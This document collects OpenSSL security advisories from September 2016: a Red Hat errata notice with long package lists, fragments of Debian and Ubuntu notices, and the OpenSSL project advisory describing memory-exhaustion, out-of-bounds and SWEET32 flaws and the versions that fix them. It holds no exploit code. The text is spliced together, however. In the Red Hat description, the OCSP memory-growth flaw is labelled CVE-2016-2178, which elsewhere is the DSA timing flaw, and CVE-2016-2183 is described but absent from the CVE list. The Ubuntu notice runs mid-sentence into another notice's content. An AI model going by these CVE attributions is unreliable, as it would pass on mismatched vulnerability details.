Synopsis: Important: openssl security update Advisory ID: RHSA-2016:1940-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-1940.html Issue date: 2016-09-27 CVE Names: CVE-2016-2177 CVE-2016-2178 CVE-2016-2179 CVE-2016-2180 CVE-2016-2181 CVE-2016-2182 CVE-2016-6302 CVE-2016-6304 CVE-2016-6306 =====================================================================
- Summary:
An update for openssl is now available for Red Hat Enterprise Linux 6 and Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library. A remote attacker could cause a TLS server using OpenSSL to consume an excessive amount of memory and, possibly, exit unexpectedly after exhausting all available memory, if it enabled OCSP stapling support. (CVE-2016-2178)
-
It was discovered that the Datagram TLS (DTLS) implementation could fail to release memory in certain cases. A malicious DTLS client could cause a DTLS server using OpenSSL to consume an excessive amount of memory and, possibly, exit unexpectedly after exhausting all available memory. A remote attacker could possibly use this flaw to make a DTLS server using OpenSSL to reject further packets sent from a DTLS client over an established DTLS connection. (CVE-2016-2181)
-
An out of bounds write flaw was discovered in the OpenSSL BN_bn2dec() function. (CVE-2016-2182)
-
A flaw was found in the DES/3DES cipher was used as part of the TLS/SSL protocol. A man-in-the-middle attacker could use this flaw to recover some plaintext data by capturing large amounts of encrypted traffic between TLS/SSL server and client if the communication used a DES/3DES based ciphersuite. (CVE-2016-2183)
This update mitigates the CVE-2016-2183 issue by lowering priority of DES cipher suites so they are not preferred over cipher suites using AES. For compatibility reasons, DES cipher suites remain enabled by default and included in the set of cipher suites identified by the HIGH cipher string. Future updates may move them to MEDIUM or not enable them by default.
-
An integer underflow flaw leading to a buffer over-read was found in the way OpenSSL parsed TLS session tickets. (CVE-2016-6302)
-
Multiple integer overflow flaws were found in the way OpenSSL performed pointer arithmetic. A remote attacker could possibly use these flaws to cause a TLS/SSL server or client using OpenSSL to crash. (CVE-2016-2177)
-
An out of bounds read flaw was found in the way OpenSSL formatted Public Key Infrastructure Time-Stamp Protocol data for printing. An attacker could possibly cause an application using OpenSSL to crash if it printed time stamp data from the attacker. A remote attacker could possibly use these flaws to crash a TLS/SSL server or client using OpenSSL. (CVE-2016-6306)
Red Hat would like to thank the OpenSSL project for reporting CVE-2016-6304 and CVE-2016-6306 and OpenVPN for reporting CVE-2016-2183.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted.
- Bugs fixed (https://bugzilla.redhat.com/):
1341705 - CVE-2016-2177 openssl: Possible integer overflow vulnerabilities in codebase 1343400 - CVE-2016-2178 openssl: Non-constant time codepath followed for certain operations in DSA implementation 1359615 - CVE-2016-2180 OpenSSL: OOB read in TS_OBJ_print_bio() 1367340 - CVE-2016-2182 openssl: Out-of-bounds write caused by unchecked errors in BN_bn2dec() 1369113 - CVE-2016-2181 openssl: DTLS replay protection bypass allows DoS against DTLS connection 1369383 - CVE-2016-2183 SSL/TLS: Birthday attack against 64-bit block ciphers (SWEET32) 1369504 - CVE-2016-2179 openssl: DTLS memory exhaustion DoS when messages are not removed from fragment buffer 1369855 - CVE-2016-6302 openssl: Insufficient TLS session ticket HMAC length checks 1377594 - CVE-2016-6306 openssl: certificate message OOB reads 1377600 - CVE-2016-6304 openssl: OCSP Status Request extension unbounded memory growth
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: openssl-1.0.1e-48.el6_8.3.src.rpm
i386: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm
x86_64: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-perl-1.0.1e-48.el6_8.3.i686.rpm openssl-static-1.0.1e-48.el6_8.3.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-static-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: openssl-1.0.1e-48.el6_8.3.src.rpm
x86_64: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-static-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: openssl-1.0.1e-48.el6_8.3.src.rpm
i386: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm
ppc64: openssl-1.0.1e-48.el6_8.3.ppc.rpm openssl-1.0.1e-48.el6_8.3.ppc64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.ppc.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.ppc64.rpm openssl-devel-1.0.1e-48.el6_8.3.ppc.rpm openssl-devel-1.0.1e-48.el6_8.3.ppc64.rpm
s390x: openssl-1.0.1e-48.el6_8.3.s390.rpm openssl-1.0.1e-48.el6_8.3.s390x.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.s390.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.s390x.rpm openssl-devel-1.0.1e-48.el6_8.3.s390.rpm openssl-devel-1.0.1e-48.el6_8.3.s390x.rpm
x86_64: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-perl-1.0.1e-48.el6_8.3.i686.rpm openssl-static-1.0.1e-48.el6_8.3.i686.rpm
ppc64: openssl-debuginfo-1.0.1e-48.el6_8.3.ppc64.rpm openssl-perl-1.0.1e-48.el6_8.3.ppc64.rpm openssl-static-1.0.1e-48.el6_8.3.ppc64.rpm
s390x: openssl-debuginfo-1.0.1e-48.el6_8.3.s390x.rpm openssl-perl-1.0.1e-48.el6_8.3.s390x.rpm openssl-static-1.0.1e-48.el6_8.3.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-static-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: openssl-1.0.1e-48.el6_8.3.src.rpm
i386: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm
x86_64: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-perl-1.0.1e-48.el6_8.3.i686.rpm openssl-static-1.0.1e-48.el6_8.3.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-static-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source: openssl-1.0.1e-51.el7_2.7.src.rpm
x86_64: openssl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.7.i686.rpm openssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.7.i686.rpm openssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-static-1.0.1e-51.el7_2.7.i686.rpm openssl-static-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: openssl-1.0.1e-51.el7_2.7.src.rpm
x86_64: openssl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.7.i686.rpm openssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.7.i686.rpm openssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-static-1.0.1e-51.el7_2.7.i686.rpm openssl-static-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: openssl-1.0.1e-51.el7_2.7.src.rpm
ppc64: openssl-1.0.1e-51.el7_2.7.ppc64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.ppc.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.ppc64.rpm openssl-devel-1.0.1e-51.el7_2.7.ppc.rpm openssl-devel-1.0.1e-51.el7_2.7.ppc64.rpm openssl-libs-1.0.1e-51.el7_2.7.ppc.rpm openssl-libs-1.0.1e-51.el7_2.7.ppc64.rpm
ppc64le: openssl-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-devel-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-libs-1.0.1e-51.el7_2.7.ppc64le.rpm
s390x: openssl-1.0.1e-51.el7_2.7.s390x.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.s390.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.s390x.rpm openssl-devel-1.0.1e-51.el7_2.7.s390.rpm openssl-devel-1.0.1e-51.el7_2.7.s390x.rpm openssl-libs-1.0.1e-51.el7_2.7.s390.rpm openssl-libs-1.0.1e-51.el7_2.7.s390x.rpm
x86_64: openssl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.7.i686.rpm openssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.7.i686.rpm openssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: openssl-debuginfo-1.0.1e-51.el7_2.7.ppc.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.ppc64.rpm openssl-perl-1.0.1e-51.el7_2.7.ppc64.rpm openssl-static-1.0.1e-51.el7_2.7.ppc.rpm openssl-static-1.0.1e-51.el7_2.7.ppc64.rpm
ppc64le: openssl-debuginfo-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-perl-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-static-1.0.1e-51.el7_2.7.ppc64le.rpm
s390x: openssl-debuginfo-1.0.1e-51.el7_2.7.s390.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.s390x.rpm openssl-perl-1.0.1e-51.el7_2.7.s390x.rpm openssl-static-1.0.1e-51.el7_2.7.s390.rpm openssl-static-1.0.1e-51.el7_2.7.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-static-1.0.1e-51.el7_2.7.i686.rpm openssl-static-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: openssl-1.0.1e-51.el7_2.7.src.rpm
x86_64: openssl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.7.i686.rpm openssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.7.i686.rpm openssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-static-1.0.1e-51.el7_2.7.i686.rpm openssl-static-1.0.1e-51.el7_2.7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2016-2177 https://access.redhat.com/security/cve/CVE-2016-2178 https://access.redhat.com/security/cve/CVE-2016-2179 https://access.redhat.com/security/cve/CVE-2016-2180 https://access.redhat.com/security/cve/CVE-2016-2181 https://access.redhat.com/security/cve/CVE-2016-2182 https://access.redhat.com/security/cve/CVE-2016-6302 https://access.redhat.com/security/cve/CVE-2016-6304 https://access.redhat.com/security/cve/CVE-2016-6306 https://access.redhat.com/security/updates/classification/#important https://www.openssl.org/news/secadv/20160922.txt
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFX6nnFXlSAg2UNWIIRAqklAJ9uGMit/wxZ0CfuGjR7Vi2+AjmGMwCfTpEI xpTW7ApBLmKhVjs49DGYouI= =4VgY -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Additional information can be found at https://www.openssl.org/blog/blog/2016/06/27/undefined-pointer-arithmetic/
CVE-2016-2178
Cesar Pereida, Billy Brumley and Yuval Yarom discovered a timing
leak in the DSA code.
CVE-2016-2179 / CVE-2016-2181
Quan Luo and the OCAP audit team discovered denial of service
vulnerabilities in DTLS.
For the stable distribution (jessie), these problems have been fixed in version 1.0.1t-1+deb8u4.
For the unstable distribution (sid), these problems will be fixed soon. ========================================================================== Ubuntu Security Notice USN-3087-2 September 23, 2016
openssl regression
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.04 LTS
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
USN-3087-1 introduced a regression in OpenSSL. The fix for CVE-2016-2182 was incomplete and caused a regression when parsing certificates. This update fixes the problem.
We apologize for the inconvenience. This issue has only been addressed in Ubuntu 16.04 LTS in this update. (CVE-2016-2178) Quan Luo discovered that OpenSSL did not properly restrict the lifetime of queue entries in the DTLS implementation. (CVE-2016-2181) Shi Lei discovered that OpenSSL incorrectly validated division results. (CVE-2016-2182) Karthik Bhargavan and Gaetan Leurent discovered that the DES and Triple DES ciphers were vulnerable to birthday attacks. (CVE-2016-2183) Shi Lei discovered that OpenSSL incorrectly handled certain ticket lengths. (CVE-2016-6303) Shi Lei discovered that OpenSSL incorrectly performed certain message length checks. (CVE-2016-6306)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 16.04 LTS: libssl1.0.0 1.0.2g-1ubuntu4.5
Ubuntu 14.04 LTS: libssl1.0.0 1.0.1f-1ubuntu2.21
Ubuntu 12.04 LTS: libssl1.0.0 1.0.1-4ubuntu5.38
After a standard system update you need to reboot your computer to make all the necessary changes. OpenSSL Security Advisory [22 Sep 2016] ========================================
OCSP Status Request extension unbounded memory growth (CVE-2016-6304)
Severity: High
A malicious client can send an excessively large OCSP Status Request extension. If that client continually requests renegotiation, sending a large OCSP Status Request extension each time, then there will be unbounded memory growth on the server. This will eventually lead to a Denial Of Service attack through memory exhaustion. Servers with a default configuration are vulnerable even if they do not support OCSP. Builds using the "no-ocsp" build time option are not affected.
Servers using OpenSSL versions prior to 1.0.1g are not vulnerable in a default configuration, instead only if an application explicitly enables OCSP stapling support.
OpenSSL 1.1.0 users should upgrade to 1.1.0a OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 29th August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL development team.
SSL_peek() hang on empty record (CVE-2016-6305)
Severity: Moderate
OpenSSL 1.1.0 SSL/TLS will hang during a call to SSL_peek() if the peer sends an empty record. This could be exploited by a malicious peer in a Denial Of Service attack.
OpenSSL 1.1.0 users should upgrade to 1.1.0a
This issue was reported to OpenSSL on 10th September 2016 by Alex Gaynor. The fix was developed by Matt Caswell of the OpenSSL development team.
SWEET32 Mitigation (CVE-2016-2183)
Severity: Low
SWEET32 (https://sweet32.info) is an attack on older block cipher algorithms that use a block size of 64 bits. In mitigation for the SWEET32 attack DES based ciphersuites have been moved from the HIGH cipherstring group to MEDIUM in OpenSSL 1.0.1 and OpenSSL 1.0.2. OpenSSL 1.1.0 since release has had these ciphersuites disabled by default.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 16th August 2016 by Karthikeyan Bhargavan and Gaetan Leurent (INRIA). The fix was developed by Rich Salz of the OpenSSL development team.
OOB write in MDC2_Update() (CVE-2016-6303)
Severity: Low
An overflow can occur in MDC2_Update() either if called directly or through the EVP_DigestUpdate() function using MDC2. If an attacker is able to supply very large amounts of input data after a previous call to EVP_EncryptUpdate() with a partial block then a length check can overflow resulting in a heap corruption.
The amount of data needed is comparable to SIZE_MAX which is impractical on most platforms.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 11th August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
Malformed SHA512 ticket DoS (CVE-2016-6302)
Severity: Low
If a server uses SHA512 for TLS session ticket HMAC it is vulnerable to a DoS attack where a malformed ticket will result in an OOB read which will ultimately crash.
The use of SHA512 in TLS session tickets is comparatively rare as it requires a custom server callback and ticket lookup mechanism.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 19th August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
OOB write in BN_bn2dec() (CVE-2016-2182)
Severity: Low
The function BN_bn2dec() does not check the return value of BN_div_word(). This can cause an OOB write if an application uses this function with an overly large BIGNUM. This could be a problem if an overly large certificate or CRL is printed out from an untrusted source. TLS is not affected because record limits will reject an oversized certificate before it is parsed.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 2nd August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
OOB read in TS_OBJ_print_bio() (CVE-2016-2180)
Severity: Low
The function TS_OBJ_print_bio() misuses OBJ_obj2txt(): the return value is the total length the OID text representation would use and not the amount of data written. This will result in OOB reads when large OIDs are presented.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 21st July 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
Pointer arithmetic undefined behaviour (CVE-2016-2177)
Severity: Low
Avoid some undefined pointer arithmetic
A common idiom in the codebase is to check limits in the following manner: "p + len > limit"
Where "p" points to some malloc'd data of SIZE bytes and limit == p + SIZE
"len" here could be from some externally supplied data (e.g. from a TLS message).
The rules of C pointer arithmetic are such that "p + len" is only well defined where len <= SIZE. Therefore the above idiom is actually undefined behaviour.
For example this could cause problems if some malloc implementation provides an address for "p" such that "p + len" actually overflows for values of len that are too big and therefore p + len < limit.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 4th May 2016 by Guido Vranken. The fix was developed by Matt Caswell of the OpenSSL development team.
Constant time flag not preserved in DSA signing (CVE-2016-2178)
Severity: Low
Operations in the DSA signing algorithm should run in constant time in order to avoid side channel attacks. A flaw in the OpenSSL DSA implementation means that a non-constant time codepath is followed for certain operations. This has been demonstrated through a cache-timing attack to be sufficient for an attacker to recover the private DSA key.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 23rd May 2016 by César Pereida (Aalto University), Billy Brumley (Tampere University of Technology), and Yuval Yarom (The University of Adelaide and NICTA). The fix was developed by César Pereida.
DTLS buffered message DoS (CVE-2016-2179)
Severity: Low
In a DTLS connection where handshake messages are delivered out-of-order those messages that OpenSSL is not yet ready to process will be buffered for later use. Under certain circumstances, a flaw in the logic means that those messages do not get removed from the buffer even though the handshake has been completed. An attacker could force up to approx. 15 messages to remain in the buffer when they are no longer required. These messages will be cleared when the DTLS connection is closed. The default maximum size for a message is 100k. Therefore the attacker could force an additional 1500k to be consumed per connection. By opening many simulataneous connections an attacker could cause a DoS attack through memory exhaustion.
OpenSSL 1.0.2 DTLS users should upgrade to 1.0.2i OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 22nd June 2016 by Quan Luo. The fix was developed by Matt Caswell of the OpenSSL development team.
DTLS replay protection DoS (CVE-2016-2181)
Severity: Low
A flaw in the DTLS replay attack protection mechanism means that records that arrive for future epochs update the replay protection "window" before the MAC for the record has been validated. This could be exploited by an attacker by sending a record for the next epoch (which does not have to decrypt or have a valid MAC), with a very large sequence number. This means that all subsequent legitimate packets are dropped causing a denial of service for a specific DTLS connection.
OpenSSL 1.0.2 DTLS users should upgrade to 1.0.2i OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 21st November 2015 by the OCAP audit team. The fix was developed by Matt Caswell of the OpenSSL development team.
Certificate message OOB reads (CVE-2016-6306)
Severity: Low
In OpenSSL 1.0.2 and earlier some missing message length checks can result in OOB reads of up to 2 bytes beyond an allocated buffer. There is a theoretical DoS risk but this has not been observed in practice on common platforms.
The messages affected are client certificate, client certificate request and server certificate. As a result the attack can only be performed against a client or a server which enables client authentication.
OpenSSL 1.1.0 is not affected.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 22nd August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
Excessive allocation of memory in tls_get_message_header() (CVE-2016-6307)
Severity: Low
A TLS message includes 3 bytes for its length in the header for the message. This would allow for messages up to 16Mb in length. Messages of this length are excessive and OpenSSL includes a check to ensure that a peer is sending reasonably sized messages in order to avoid too much memory being consumed to service a connection. A flaw in the logic of version 1.1.0 means that memory for the message is allocated too early, prior to the excessive message length check. Due to way memory is allocated in OpenSSL this could mean an attacker could force up to 21Mb to be allocated to service a connection. This could lead to a Denial of Service through memory exhaustion. However, the excessive message length check still takes place, and this would cause the connection to immediately fail. Assuming that the application calls SSL_free() on the failed conneciton in a timely manner then the 21Mb of allocated memory will then be immediately freed again. Therefore the excessive memory allocation will be transitory in nature. This then means that there is only a security impact if:
1) The application does not call SSL_free() in a timely manner in the event that the connection fails or 2) The application is working in a constrained environment where there is very little free memory or 3) The attacker initiates multiple connection attempts such that there are multiple connections in a state where memory has been allocated for the connection; SSL_free() has not yet been called; and there is insufficient memory to service the multiple requests.
Except in the instance of (1) above any Denial Of Service is likely to be transitory because as soon as the connection fails the memory is subsequently freed again in the SSL_free() call. However there is an increased risk during this period of application crashes due to the lack of memory - which would then mean a more serious Denial of Service.
This issue does not affect DTLS users.
OpenSSL 1.1.0 TLS users should upgrade to 1.1.0a
This issue was reported to OpenSSL on 18th September 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL development team.
Excessive allocation of memory in dtls1_preprocess_fragment() (CVE-2016-6308)
Severity: Low
This issue is very similar to CVE-2016-6307. The underlying defect is different but the security analysis and impacts are the same except that it impacts DTLS.
A DTLS message includes 3 bytes for its length in the header for the message. This would allow for messages up to 16Mb in length. Messages of this length are excessive and OpenSSL includes a check to ensure that a peer is sending reasonably sized messages in order to avoid too much memory being consumed to service a connection. A flaw in the logic of version 1.1.0 means that memory for the message is allocated too early, prior to the excessive message length check. Due to way memory is allocated in OpenSSL this could mean an attacker could force up to 21Mb to be allocated to service a connection. This could lead to a Denial of Service through memory exhaustion. However, the excessive message length check still takes place, and this would cause the connection to immediately fail. Assuming that the application calls SSL_free() on the failed conneciton in a timely manner then the 21Mb of allocated memory will then be immediately freed again. Therefore the excessive memory allocation will be transitory in nature. This then means that there is only a security impact if:
1) The application does not call SSL_free() in a timely manner in the event that the connection fails or 2) The application is working in a constrained environment where there is very little free memory or 3) The attacker initiates multiple connection attempts such that there are multiple connections in a state where memory has been allocated for the connection; SSL_free() has not yet been called; and there is insufficient memory to service the multiple requests.
Except in the instance of (1) above any Denial Of Service is likely to be transitory because as soon as the connection fails the memory is subsequently freed again in the SSL_free() call. However there is an increased risk during this period of application crashes due to the lack of memory - which would then mean a more serious Denial of Service.
This issue does not affect TLS users.
OpenSSL 1.1.0 DTLS users should upgrade to 1.1.0a
This issue was reported to OpenSSL on 18th September 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL development team.
Note
As per our previous announcements and our Release Strategy (https://www.openssl.org/policies/releasestrat.html), support for OpenSSL version 1.0.1 will cease on 31st December 2016. No security updates for that version will be provided after that date. Users of 1.0.1 are advised to upgrade.
Support for versions 0.9.8 and 1.0.0 ended on 31st December 2015. Those versions are no longer receiving security updates.
References
URL for this Security Advisory: https://www.openssl.org/news/secadv/20160922.txt
Note: the online version of the advisory may be updated with additional details over time.
For details of OpenSSL severity classifications please see: https://www.openssl.org/policies/secpolicy.html
